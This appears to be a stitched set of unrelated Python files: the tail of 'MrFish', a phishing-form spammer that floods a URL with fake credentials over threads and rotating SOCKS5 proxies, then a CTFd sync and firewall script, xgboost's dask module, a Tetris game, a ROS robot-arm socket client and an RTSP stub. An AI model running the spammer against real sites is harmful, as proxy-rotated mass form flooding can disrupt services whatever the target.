proxy = f'socks5://{random.choice(proxy_list)}'
continue
# print(f'Error: {e.__class__.__name__}')
mrfish_display = """.
\033[93m /`·.¸ \033[0m
\033[93m /¸...¸`:· \033[0m \033[93mMrFish\033[0m - Discord Nitro Phishing Form Spammer w/header support
\033[93m ¸.·´ ¸ `·.¸.·´) \033[0m
\033[93m : © ):´; ¸ { \033[0m By Daan Van Essen#1337 / Amadeus
\033[93m `·.¸ `· ¸.·´\`·¸) \033[0m Modified by rens#6161
\033[93m `\\\\´´\¸.·´ \033[0m
."""
mrfish_display_list = mrfish_display.split('\n')
if __name__ == '__main__':
for i in mrfish_display_list:
os.system(f'echo{i}')
url = input(' Form Request URL: ')
headers = {'Cookie': '{formDataNameCookie}', 'Content-Type': '{formDataNameContentType}'}
formDataNameLogin = input(' Form Data Username [Account/Email] Name: ')
formDataNamePass = input(' Form Data Password Name: ')
formDataNameCookie = input(' Required Cookie: ')
formDataNameContentType = input(' Content Type: ')
while True:
formDataNameLoginName = input(' Is this a username or email? [u/e]: ')
if formDataNameLoginName.lower() in ('u', 'e'):
if formDataNameLoginName.lower() == 'u':
break
if formDataNameLoginName.lower() == 'e':
break
else:
print(' That is not a valid option')
continue
while True:
threads = input(' Threads [recommend max of 32]: ')
if threads.isdigit() and 1 <= int(threads) <= 5000:
threads = int(threads)
break
else:
print(' Please enter a valid number between 0 and 5001')
continue
while True:
use_proxy = input(' Enable Proxy [Y/N]: ')
if use_proxy.lower() in ('y', 'n'):
if use_proxy.lower() == 'y':
print('Since you are using the proxy setting, you might experience slower performance and less stability, however, we do filter status requests.\n\n')
print('A kind note to the proxy setting:\nThis setting might, on some sites, seem to not be working as you have not seen any recent requests.\n\n')
break
if use_proxy.lower() == 'n':
break
else:
print(' That is not a valid option')
continue
chars = string.ascii_letters + string.digits
random.seed = (os.urandom(1024))
names = json.loads(open('assets/names.json').read())
emails = json.loads(open('assets/emails.json').read())
ext = json.loads(open('assets/extensions.json').read())
dictionary = json.loads(open('assets/dictionary.json').read())
proxy_list = json.loads(open('assets/proxies.json').read())
for i in range(threads):
t = threading.Thread(target=run)
t.start()
|
ctfd.py
|
import os
import re
import threading
import yaml
import json
# Initialize ctfcli with the CTFD_TOKEN and CTFD_URL.
def init():
CTFD_TOKEN = os.getenv("CTFD_TOKEN", default=None)
CTFD_URL = os.getenv("CTFD_URL", default=None)
if not CTFD_TOKEN or not CTFD_URL:
exit(1)
os.system(f"echo '{CTFD_URL}\n{CTFD_TOKEN}\ny' | ctf init")
# Each category is in it's own directory, get the names of all directories that do not begin with '.'.
def get_categories():
denylist_regex = r'\..*'
categories = [name for name in os.listdir(".") if os.path.isdir(name) and not re.match(denylist_regex, name)]
print("Categories: " + ", ".join(categories))
return categories
# Synchronize all challenges in the given category, where each challenge is in it's own folder.
def sync(category):
challenges = [f"{category}/{name}" for name in os.listdir(f"./{category}") if os.path.isdir(f"{category}/{name}")]
for challenge in challenges:
if os.path.exists(f"{challenge}/challenge.yml"):
print(f"Syncing challenge: {challenge}")
os.system(f"ctf challenge sync '{challenge}'; ctf challenge install '{challenge}'")
# Change the state of certain waves of challenges
def change_state(waves, state):
if state not in ['visible', 'hidden']:
raise Exception("state must be 'visible' or 'hidden'")
challenge_waves = open('challenge-waves.yml').read()
challenge_waves = yaml.load(challenge_waves, Loader=yaml.FullLoader)
visible = {}
hidden = {}
categories = get_categories()
for category in categories:
visible[category] = []
hidden[category] = []
for wave in challenge_waves:
if wave in waves:
for category in challenge_waves[wave]:
for challenge in challenge_waves[wave][category]:
chall = open(f'{category}/{challenge}/challenge.yml', 'r')
challenge_yml = yaml.load(chall, Loader=yaml.FullLoader)
challenge_yml['state'] = state
if state == 'visible':
name = challenge_yml['name'].lower().replace(' ', '-')
if 'expose' in challenge_yml:
visible[category].append({'name': name, 'port': challenge_yml['expose'][0]['nodePort']})
else:
visible[category].append({'name': name, 'port': 0})
else:
if 'expose' in challenge_yml:
hidden[category].append({'name': name, 'port': challenge_yml['expose'][0]['nodePort']})
else:
hidden[category].append({'name': name, 'port': 0})
chall = open(f'{category}/{challenge}/challenge.yml', 'w')
yaml.dump(challenge_yml, chall, sort_keys=False)
else:
for category in challenge_waves[wave]:
for challenge in challenge_waves[wave][category]:
chall = open(f'{category}/{challenge}/challenge.yml', 'r')
challenge_yml = yaml.load(chall, Loader=yaml.FullLoader)
challenge_yml['state'] = 'hidden'
name = challenge_yml['name'].lower().replace(' ', '-')
if 'expose' in challenge_yml:
hidden[category].append({'name': name, 'port': challenge_yml['expose'][0]['nodePort']})
else:
hidden[category].append({'name': name, 'port': 0})
return visible, hidden
# Firewall rules for visible challenges
def firewall(visible, hidden):
rules = os.popen('gcloud compute firewall-rules --format=json list').read()
for category in visible:
for challenge in visible[category]:
if challenge['port'] and challenge['name'] not in rules:
os.system(
f"""
gcloud compute firewall-rules create {challenge['name']} \
--allow tcp:{challenge['port']} \
--priority 1000 \
--target-tags challs
"""
)
print('Created firewall rules for:')
print(challenge['name'])
for category in hidden:
for challenge in hidden[category]:
if challenge['port'] and challenge['name'] in rules:
os.system(
f"""
echo -e "Y\n" | gcloud compute firewall-rules delete {challenge['name']}
"""
)
print('Deleted firewall rules for:')
print(challenge['name'])
# Synchronize each category in it's own thread.
if __name__ == "__main__":
visible, hidden = change_state(['wave1', 'wave2'], 'visible')
init()
categories = get_categories()
jobs = []
for category in categories:
jobs.append(threading.Thread(target=sync, args=(category, )))
for job in jobs:
job.start()
for job in jobs:
job.join()
print("Synchronized successfully!")
print("The following challenges are now visible:")
for category in visible:
print(f"\n{category}:")
print('- ' + '\n- '.join([challenge['name'] for challenge in visible[category]]))
firewall(visible, hidden)
print("Firewall rules updated.")
|
dask.py
|
# pylint: disable=too-many-arguments, too-many-locals
"""Dask extensions for distributed training. See
https://xgboost.readthedocs.io/en/latest/tutorials/dask.html for simple
tutorial. Also xgboost/demo/dask for some examples.
There are two sets of APIs in this module, one is the functional API including
``train`` and ``predict`` methods. Another is stateful Scikit-Learner wrapper
inherited from single-node Scikit-Learn interface.
The implementation is heavily influenced by dask_xgboost:
https://github.com/dask/dask-xgboost
"""
import platform
import logging
from collections import defaultdict
from threading import Thread
import numpy
from . import rabit
from .compat import DASK_INSTALLED
from .compat import distributed_get_worker, distributed_wait, distributed_comm
from .compat import da, dd, delayed, get_client
from .compat import sparse, scipy_sparse
from .compat import PANDAS_INSTALLED, DataFrame, Series, pandas_concat
from .compat import CUDF_INSTALLED, CUDF_DataFrame, CUDF_Series, CUDF_concat
from .core import DMatrix, Booster, _expect
from .training import train as worker_train
from .tracker import RabitTracker
from .sklearn import XGBModel, XGBClassifierBase, xgboost_model_doc
# Current status is considered as initial support, many features are
# not properly supported yet.
#
# TODOs:
# - Callback.
# - Label encoding.
# - CV
# - Ranking
def _start_tracker(host, n_workers):
"""Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
rabit_context = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit_context.slave_envs())
rabit_context.start(n_workers)
thread = Thread(target=rabit_context.join)
thread.daemon = True
thread.start()
return env
def _assert_dask_support():
if not DASK_INSTALLED:
raise ImportError(
'Dask needs to be installed in order to use this module')
if platform.system() == 'Windows':
msg = 'Windows is not officially supported for dask/xgboost,'
msg += ' contribution are welcomed.'
logging.warning(msg)
class RabitContext:
'''A context controling rabit initialization and finalization.'''
def __init__(self, args):
self.args = args
def __enter__(self):
rabit.init(self.args)
logging.debug('-------------- rabit say hello ------------------')
def __exit__(self, *args):
rabit.finalize()
logging.debug('--------------- rabit say bye ------------------')
def concat(value):
'''To be replaced with dask builtin.'''
if isinstance(value[0], numpy.ndarray):
return numpy.concatenate(value, axis=0)
if scipy_sparse and isinstance(value[0], scipy_sparse.spmatrix):
return scipy_sparse.vstack(value, format='csr')
if sparse and isinstance(value[0], sparse.SparseArray):
return sparse.concatenate(value, axis=0)
if PANDAS_INSTALLED and isinstance(value[0], (DataFrame, Series)):
return pandas_concat(value, axis=0)
if CUDF_INSTALLED and isinstance(value[0], (CUDF_DataFrame, CUDF_Series)):
return CUDF_concat(value, axis=0)
return dd.multi.concat(list(value), axis=0)
def _xgb_get_client(client):
'''Simple wrapper around testing None.'''
ret = get_client() if client is None else client
return ret
def _get_client_workers(client):
workers = client.scheduler_info()['workers']
return workers
def _assert_client(client):
if not isinstance(client, (type(get_client()), type(None))):
raise TypeError(
_expect([type(get_client()), type(None)], type(client)))
class DaskDMatrix:
# pylint: disable=missing-docstring, too-many-instance-attributes
'''DMatrix holding on references to Dask DataFrame or Dask Array. Constructing
a `DaskDMatrix` forces all lazy computation to be carried out. Wait for
the input data explicitly if you want to see actual computation of
constructing `DaskDMatrix`.
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
data : dask.array.Array/dask.dataframe.DataFrame
data source of DMatrix.
label: dask.array.Array/dask.dataframe.DataFrame
label used for trainin.
missing : float, optional
Value in the input data (e.g. `numpy.ndarray`) which needs
to be present as a missing value. If None, defaults to np.nan.
weight : dask.array.Array/dask.dataframe.DataFrame
Weight for each instance.
feature_names : list, optional
Set names for features.
feature_types : list, optional
Set types for features
'''
_feature_names = None # for previous version's pickle
_feature_types = None
def __init__(self,
client,
data,
label=None,
missing=None,
weight=None,
feature_names=None,
feature_types=None):
_assert_dask_support()
_assert_client(client)
self._feature_names = feature_names
self._feature_types = feature_types
self._missing = missing
if len(data.shape) != 2:
raise ValueError(
'Expecting 2 dimensional input, got: {shape}'.format(
shape=data.shape))
if not isinstance(data, (dd.DataFrame, da.Array)):
raise TypeError(_expect((dd.DataFrame, da.Array), type(data)))
if not isinstance(label, (dd.DataFrame, da.Array, dd.Series,
type(None))):
raise TypeError(
_expect((dd.DataFrame, da.Array, dd.Series), type(label)))
self.worker_map = None
self.has_label = label is not None
self.has_weights = weight is not None
client = _xgb_get_client(client)
client.sync(self.map_local_data, client, data, label, weight)
async def map_local_data(self, client, data, label=None, weights=None):
'''Obtain references to local data.'''
def inconsistent(left, left_name, right, right_name):
msg = 'Partitions between {a_name} and {b_name} are not ' \
'consistent: {a_len} != {b_len}. ' \
'Please try to repartition/rechunk your data.'.format(
a_name=left_name, b_name=right_name, a_len=len(left),
b_len=len(right)
)
return msg
def check_columns(parts):
# x is required to be 2 dim in __init__
assert parts.ndim == 1 or parts.shape[1], 'Data should be' \
' partitioned by row. To avoid this specify the number' \
' of columns for your dask Array explicitly. e.g.' \
' chunks=(partition_size, X.shape[1])'
data = data.persist()
if label is not None:
label = label.persist()
if weights is not None:
weights = weights.persist()
# Breaking data into partitions, a trick borrowed from dask_xgboost.
# `to_delayed` downgrades high-level objects into numpy or pandas
# equivalents.
X_parts = data.to_delayed()
if isinstance(X_parts, numpy.ndarray):
check_columns(X_parts)
X_parts = X_parts.flatten().tolist()
if label is not None:
y_parts = label.to_delayed()
if isinstance(y_parts, numpy.ndarray):
check_columns(y_parts)
y_parts = y_parts.flatten().tolist()
if weights is not None:
w_parts = weights.to_delayed()
if isinstance(w_parts, numpy.ndarray):
check_columns(w_parts)
w_parts = w_parts.flatten().tolist()
parts = [X_parts]
if label is not None:
assert len(X_parts) == len(
y_parts), inconsistent(X_parts, 'X', y_parts, 'labels')
parts.append(y_parts)
if weights is not None:
assert len(X_parts) == len(
w_parts), inconsistent(X_parts, 'X', w_parts, 'weights')
parts.append(w_parts)
parts = list(map(delayed, zip(*parts)))
parts = client.compute(parts)
await distributed_wait(parts) # async wait for parts to be computed
for part in parts:
assert part.status == 'finished'
key_to_partition = {part.key: part for part in parts}
who_has = await client.scheduler.who_has(
keys=[part.key for part in parts])
worker_map = defaultdict(list)
for key, workers in who_has.items():
worker_map[next(iter(workers))].append(key_to_partition[key])
self.worker_map = worker_map
def get_worker_parts(self, worker):
'''Get mapped parts of data in each worker.'''
list_of_parts = self.worker_map[worker.address]
assert list_of_parts, 'data in ' + worker.address + ' was moved.'
assert isinstance(list_of_parts, list)
# `get_worker_parts` is launched inside worker. In dask side
# this should be equal to `worker._get_client`.
client = get_client()
list_of_parts = client.gather(list_of_parts)
if self.has_label:
if self.has_weights:
data, labels, weights = zip(*list_of_parts)
else:
data, labels = zip(*list_of_parts)
weights = None
else:
data = [d[0] for d in list_of_parts]
labels = None
weights = None
return data, labels, weights
def get_worker_data(self, worker):
'''Get data that local to worker.
Parameters
----------
worker: The worker used as key to data.
Returns
-------
A DMatrix object.
'''
if worker.address not in set(self.worker_map.keys()):
msg = 'worker {address} has an empty DMatrix. ' \
'All workers associated with this DMatrix: {workers}'.format(
address=worker.address,
workers=set(self.worker_map.keys()))
logging.warning(msg)
d = DMatrix(numpy.empty((0, 0)),
feature_names=self._feature_names,
feature_types=self._feature_types)
return d
data, labels, weights = self.get_worker_parts(worker)
data = concat(data)
if self.has_label:
labels = concat(labels)
else:
labels = None
if self.has_weights:
weights = concat(weights)
else:
weights = None
dmatrix = DMatrix(data,
labels,
weight=weights,
missing=self._missing,
feature_names=self._feature_names,
feature_types=self._feature_types)
return dmatrix
def get_worker_data_shape(self, worker):
'''Get the shape of data X in each worker.'''
data, _, _ = self.get_worker_parts(worker)
shapes = [d.shape for d in data]
rows = 0
cols = 0
for shape in shapes:
rows += shape[0]
c = shape[1]
assert cols in (0, c), 'Shape between partitions are not the' \
' same. Got: {left} and {right}'.format(left=c, right=cols)
cols = c
return (rows, cols)
def _get_rabit_args(worker_map, client):
'''Get rabit context arguments from data distribution in DaskDMatrix.'''
host = distributed_comm.get_address_host(client.scheduler.address)
env = client.run_on_scheduler(_start_tracker, host.strip('/:'),
len(worker_map))
rabit_args = [('%s=%s' % item).encode() for item in env.items()]
return rabit_args
# train and predict methods are supposed to be "functional", which meets the
# dask paradigm. But as a side effect, the `evals_result` in single-node API
# is no longer supported since it mutates the input parameter, and it's not
# intuitive to sync the mutation result. Therefore, a dictionary containing
# evaluation history is instead returned.
def train(client, params, dtrain, *args, evals=(), **kwargs):
'''Train XGBoost model.
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
\\*\\*kwargs:
Other parameters are the same as `xgboost.train` except for `evals_result`,
which is returned as part of function return value instead of argument.
Returns
-------
results: dict
A dictionary containing trained booster and evaluation history.
`history` field is the same as `eval_result` from `xgboost.train`.
.. code-block:: python
{'booster': xgboost.Booster,
'history': {'train': {'logloss': ['0.48253', '0.35953']},
'eval': {'logloss': ['0.480385', '0.357756']}}}
'''
_assert_dask_support()
_assert_client(client)
if 'evals_result' in kwargs.keys():
raise ValueError(
'evals_result is not supported in dask interface.',
'The evaluation history is returned as result of training.')
client = _xgb_get_client(client)
workers = list(_get_client_workers(client).keys())
rabit_args = _get_rabit_args(workers, client)
def dispatched_train(worker_addr):
'''Perform training on a single worker.'''
logging.info('Training on %s', str(worker_addr))
worker = distributed_get_worker()
with RabitContext(rabit_args):
local_dtrain = dtrain.get_worker_data(worker)
local_evals = []
if evals:
for mat, name in evals:
if mat is dtrain:
local_evals.append((local_dtrain, name))
continue
local_mat = mat.get_worker_data(worker)
local_evals.append((local_mat, name))
local_history = {}
local_param = params.copy() # just to be consistent
bst = worker_train(params=local_param,
dtrain=local_dtrain,
*args,
evals_result=local_history,
evals=local_evals,
**kwargs)
ret = {'booster': bst, 'history': local_history}
if local_dtrain.num_row() == 0:
ret = None
return ret
futures = client.map(dispatched_train,
workers,
pure=False,
workers=workers)
results = client.gather(futures)
return list(filter(lambda ret: ret is not None, results))[0]
def predict(client, model, data, *args):
'''Run prediction with a trained booster.
.. note::
Only default prediction mode is supported right now.
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model: A Booster or a dictionary returned by `xgboost.dask.train`.
The trained model.
data: DaskDMatrix
Input data used for prediction.
Returns
-------
prediction: dask.array.Array
'''
_assert_dask_support()
_assert_client(client)
if isinstance(model, Booster):
booster = model
elif isinstance(model, dict):
booster = model['booster']
else:
raise TypeError(_expect([Booster, dict], type(model)))
if not isinstance(data, DaskDMatrix):
raise TypeError(_expect([DaskDMatrix], type(data)))
worker_map = data.worker_map
client = _xgb_get_client(client)
rabit_args = _get_rabit_args(worker_map, client)
def dispatched_predict(worker_id):
'''Perform prediction on each worker.'''
logging.info('Predicting on %d', worker_id)
worker = distributed_get_worker()
local_x = data.get_worker_data(worker)
with RabitContext(rabit_args):
local_predictions = booster.predict(
data=local_x, validate_features=local_x.num_row() != 0, *args)
return local_predictions
futures = client.map(dispatched_predict,
range(len(worker_map)),
pure=False,
workers=list(worker_map.keys()))
def dispatched_get_shape(worker_id):
'''Get shape of data in each worker.'''
logging.info('Trying to get data shape on %d', worker_id)
worker = distributed_get_worker()
rows, _ = data.get_worker_data_shape(worker)
return rows, 1 # default is 1
# Constructing a dask array from list of numpy arrays
# See https://docs.dask.org/en/latest/array-creation.html
futures_shape = client.map(dispatched_get_shape,
range(len(worker_map)),
pure=False,
workers=list(worker_map.keys()))
shapes = client.gather(futures_shape)
arrays = []
for i in range(len(futures_shape)):
arrays.append(da.from_delayed(futures[i], shape=(shapes[i][0], ),
dtype=numpy.float32))
predictions = da.concatenate(arrays, axis=0)
return predictions
def _evaluation_matrices(client, validation_set, sample_weights):
'''
Parameters
----------
validation_set: list of tuples
Each tuple contains a validation dataset including input X and label y.
E.g.:
.. code-block:: python
[(X_0, y_0), (X_1, y_1), ... ]
sample_weights: list of arrays
The weight vector for validation data.
Returns
-------
evals: list of validation DMatrix
'''
evals = []
if validation_set is not None:
assert isinstance(validation_set, list)
for i, e in enumerate(validation_set):
w = (sample_weights[i]
if sample_weights is not None else None)
dmat = DaskDMatrix(client=client, data=e[0], label=e[1], weight=w)
evals.append((dmat, 'validation_{}'.format(i)))
else:
evals = None
return evals
class DaskScikitLearnBase(XGBModel):
'''Base class for implementing scikit-learn interface with Dask'''
_client = None
# pylint: disable=arguments-differ
def fit(self,
X,
y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None):
'''Fit the regressor.
Parameters
----------
X : array_like
Feature matrix
y : array_like
Labels
sample_weight : array_like
instance weights
eval_set : list, optional
A list of (X, y) tuple pairs to use as validation sets, for which
metrics will be computed.
Validation metrics will help us track the performance of the model.
sample_weight_eval_set : list, optional
A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
of group weights on the i-th validation set.'''
raise NotImplementedError
def predict(self, data): # pylint: disable=arguments-differ
'''Predict with `data`.
Parameters
----------
data: data that can be used to construct a DaskDMatrix
Returns
-------
prediction : dask.array.Array'''
raise NotImplementedError
@property
def client(self):
'''The dask client used in this model.'''
client = _xgb_get_client(self._client)
return client
@client.setter
def client(self, clt):
self._client = clt
@xgboost_model_doc("""Implementation of the Scikit-Learn API for XGBoost.""",
['estimators', 'model'])
class DaskXGBRegressor(DaskScikitLearnBase):
# pylint: disable=missing-docstring
def fit(self,
X,
y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None):
_assert_dask_support()
dtrain = DaskDMatrix(client=self.client,
data=X, label=y, weight=sample_weights)
params = self.get_xgb_params()
evals = _evaluation_matrices(self.client,
eval_set, sample_weight_eval_set)
results = train(self.client, params, dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals)
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
def predict(self, data): # pylint: disable=arguments-differ
_assert_dask_support()
test_dmatrix = DaskDMatrix(client=self.client, data=data)
pred_probs = predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
return pred_probs
@xgboost_model_doc(
'Implementation of the scikit-learn API for XGBoost classification.',
['estimators', 'model']
)
class DaskXGBClassifier(DaskScikitLearnBase, XGBClassifierBase):
# pylint: disable=missing-docstring
_client = None
def fit(self,
X,
y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None):
_assert_dask_support()
dtrain = DaskDMatrix(client=self.client,
data=X, label=y, weight=sample_weights)
params = self.get_xgb_params()
# pylint: disable=attribute-defined-outside-init
if isinstance(y, (da.Array)):
self.classes_ = da.unique(y).compute()
else:
self.classes_ = y.drop_duplicates().compute()
self.n_classes_ = len(self.classes_)
if self.n_classes_ > 2:
params["objective"] = "multi:softprob"
params['num_class'] = self.n_classes_
else:
params["objective"] = "binary:logistic"
evals = _evaluation_matrices(self.client,
eval_set, sample_weight_eval_set)
results = train(self.client, params, dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals)
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
def predict(self, data): # pylint: disable=arguments-differ
_assert_dask_support()
test_dmatrix = DaskDMatrix(client=self.client, data=data)
pred_probs = predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
return pred_probs
|
main.py
|
from tetris import *
from random import *
import threading
def LED_init():
thread=threading.Thread(target=LMD.main, args=())
thread.setDaemon(True)
thread.start()
return
def rotate(m_array):
size = len(m_array)
r_array = [[0] * size for _ in range(size)]
for y in range(size):
for x in range(size):
r_array[x][size-1-y] = m_array[y][x]
return r_array
def initSetOfBlockArrays():
arrayBlks = [ [ [ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ] ], # ㅁ
[ [0, 1, 0],
[1, 1, 1], # ㅗ
[0, 0, 0] ],
[ [1, 0, 0],
[1, 1, 1], # ㄴ
[0, 0, 0] ],
[ [0, 0, 1], # ㅁ
[1, 1, 1], # ㅁㅁㅁ
[0, 0, 0] ], #
[ [1, 1], # ㅁ
[1, 1] ],
[ [0, 1, 1], # ㅁㅁ
[1, 1, 0], # ㅁㅁ
[0, 0, 0] ], #
[ [1, 1, 0], # ㅁㅁ
[0, 1, 1], # ㅁㅁ
[0, 0, 0] ] #
]
nBlocks = len(arrayBlks)
setOfBlockArrays = [[0] * 4 for _ in range(nBlocks)]
for idxBlockType in range(nBlocks):
temp_array = arrayBlks[idxBlockType]
setOfBlockArrays[idxBlockType][0] = temp_array
for idxBlockDegree in range(1,4):
temp_array = rotate(temp_array)
setOfBlockArrays[idxBlockType][idxBlockDegree] = temp_array
return setOfBlockArrays
if __name__ == "__main__":
#LED_init()
setOfBlockArrays = initSetOfBlockArrays()
Tetris.init(setOfBlockArrays)
board = Tetris(32, 16)
idxBlockType = randint(0, 6)
key = '0' + str(idxBlockType)
board.accept(key)
board.printScreen()
while True:
key = input('Enter a key from [ q (quit), a (left), d (right), s (down), w (rotate), \' \' (drop) ] : ')
if key != 'q':
state = board.accept(key)
board.printScreen()
if state == TetrisState.NewBlock:
idxBlockType = randint(0, 6)
key = '0' + str(idxBlockType)
state = board.accept(key)
if state == TetrisState.Finished:
board.printScreen()
print('Game Over!!!')
break
board.printScreen()
else:
print('Game aborted...')
break
print('Program terminated...')
### end of pytet.py
|
Hiwin_RT605_ArmCommand_Socket_20190627181108.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = '%s'%x
pos.y = '%s'%y
pos.z = '%s'%z
pos.pitch = '%s'%pitch
pos.roll = '%s'%roll
pos.yaw = '%s'%yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%action)
socket_cmd.grip = int('%s'%grip)
socket_cmd.ra = int('%s'%ra)
socket_cmd.setvel = int('%s'%setvel)
socket_cmd.setboth = int('%s'%setboth)
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
rospy.spin()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket,arm_mode_flag,data
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
# def thread_test():
# socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
RTSPServer.py
|
# !/usr/bin/python3
__author__ = 'Simon Blandford'
import time
